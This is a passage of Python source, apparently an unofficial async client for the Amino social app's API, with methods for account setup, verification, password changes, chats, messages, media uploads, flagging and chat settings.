return response.status
async def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/persona/profile/basic", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def request_verify_code(self, email: str, resetPassword: bool = False):
"""
        Request a verification code for the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
async with self.session.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
async def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
async with self.session.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
async with self.session.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_account_info(self):
async with self.session.get(f"{self.api}/g/s/account", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfile(json.loads(await response.text())["account"]).UserProfile
async def upload_media(self, file: BinaryIO, fileType: str):
"""
        Upload a file to the amino servers.
        **Parameters**
            - **file** : File to be uploaded.
            - **fileType** : Type of the file, either ``image`` or ``audio``.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
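        **Example**
            A minimal usage sketch (hypothetical local file)::
                with open("picture.jpg", "rb") as file:
                    url = await client.upload_media(file, fileType="image")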
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
async with self.session.post(f"{self.api}/g/s/media/upload", headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["mediaValue"]
def handle_socket_message(self, data):
return self.resolve(data)
async def get_eventlog(self, language: str = "en"):
async with self.session.get(f"{self.api}/g/s/eventlog/profile?language={language}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())
async def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
async with self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommunityList(json.loads(await response.text())["communityList"]).CommunityList
async def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
async with self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["communityList"]
async def get_user_info(self, userId: str):
"""
        Information of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfile(json.loads(await response.text())["userProfile"]).UserProfile
async def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.ThreadList(json.loads(await response.text())["threadList"]).ThreadList
async def get_chat_thread(self, chatId: str):
"""
        Get the Chat Object from a Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Thread(json.loads(await response.text())["thread"]).Thread
async def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
async with self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["memberList"]).UserProfileList
async def join_chat(self, chatId: str):
"""
        Join a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def leave_chat(self, chatId: str):
"""
        Leave a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def start_chat(self, userId: Union[str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
        Start a Chat with a User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/chat/thread", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def invite_to_chat(self, userId: Union[str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType(type(userId))
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
        allowRejoin = 1 if allowRejoin else 0
async with self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
        List of Messages from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
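        **Example**
            A minimal paging sketch (hypothetical chatId; assumes the returned
            object exposes a ``nextPageToken`` attribute)::
                page = await client.get_chat_messages(chatId="000-000", size=25)
                older = await client.get_chat_messages(chatId="000-000", size=25,
                                                       pageToken=page.nextPageToken)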
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
async with self.session.get(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.GetMessages(json.loads(await response.text())).GetMessages
async def get_message_info(self, chatId: str, messageId: str):
"""
        Information of a Message from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Message(json.loads(await response.text())["message"]).Message
async def get_community_info(self, comId: str):
"""
        Information of a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Community(json.loads(await response.text())["community"]).Community
async def search_community(self, aminoId: str):
"""
        Search a Community by its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else:
response = json.loads(await response.text())["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
async def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["userProfileList"]).UserProfileList
async def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["userProfileList"]).UserProfileList
async def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.VisitorsList(json.loads(await response.text())).VisitorsList
async def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["userProfileList"]).UserProfileList
async def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
async with self.session.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.GetBlogInfo(json.loads(await response.text())).GetBlogInfo
elif wikiId:
async with self.session.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.GetWikiInfo(json.loads(await response.text())).GetWikiInfo
elif fileId:
async with self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.SharedFolderFile(json.loads(await response.text())["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
async def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
url = f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}"
elif fileId: url = f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}"
else: raise exceptions.SpecifyType()
async with self.session.get(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommentList(json.loads(await response.text())["commentList"]).CommentList
async def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["blockerUidList"]
async def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of a User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
sorting = sorting.lower()
if sorting == "top": sorting = "vote"
elif sorting not in ("newest", "oldest"): raise exceptions.WrongType(sorting)
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommentList(json.loads(await response.text())["commentList"]).CommentList
async def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded()
if flagType is None: raise exceptions.FlagTypeNeeded()
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType()
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/{flg}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDs to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, await self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType()
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
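# Usage sketch (illustrative only; `client` stands for an instance of this class and the IDs
# are placeholders):
#
#     await client.send_message(chatId, "hello")                        # plain text
#     await client.send_message(chatId, "hi again", replyTo=messageId)  # reply to a message
#     with open("photo.jpg", "rb") as f:
#         await client.send_message(chatId, file=f, fileType="image")   # image upload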
async def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff:
async with self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: BinaryIO = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
Edit a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Background Image of the Chat.
- **announcement** : Announcement of the Chat.
- **pinAnnouncement** : If the Chat Announcement should be Pinned or not.
- **coHosts** : List of User IDs to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
- **doNotDisturb** : If the Chat should be set to Do Not Disturb or not.
- **pinChat** : If the Chat should be Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"] = {"announcement": announcement}
if pinAnnouncement: data["extensions"] = {"pinAnnouncement": pinAnnouncement}
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
# alertOption 2 enables Do Not Disturb, 1 disables it; a separate variable keeps the main payload intact.
alert_data = json.dumps({"alertOption": 2 if doNotDisturb else 1, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", headers=self.parse_headers(data=alert_data), data=alert_data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if pinChat is not None:
if pinChat:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not pinChat:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if backgroundImage is not None:
background_data = json.dumps({"media": [100, await self.upload_media(backgroundImage, "image"), None], "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", headers=self.parse_headers(data=background_data), data=background_data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if coHosts is not None:
cohost_data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", headers=self.parse_headers(data=cohost_data), data=cohost_data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if viewOnly is not None:
if viewOnly:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not viewOnly:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if canInvite is not None:
if canInvite:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not canInvite:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if canTip is not None:
if canTip:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not canTip:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
return res
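# Usage sketch (illustrative only; `client` and the IDs are placeholders). Because edit_chat
# issues one request per changed setting, it returns a list with one status/exception entry
# per request it made:
#
#     results = await client.edit_chat(chatId, title="Lounge", doNotDisturb=True, pinChat=True)
#     # e.g. [200, 200, 200] when every request succeeded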
async def visit(self, userId: str):
"""
Visit a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers()) as response:
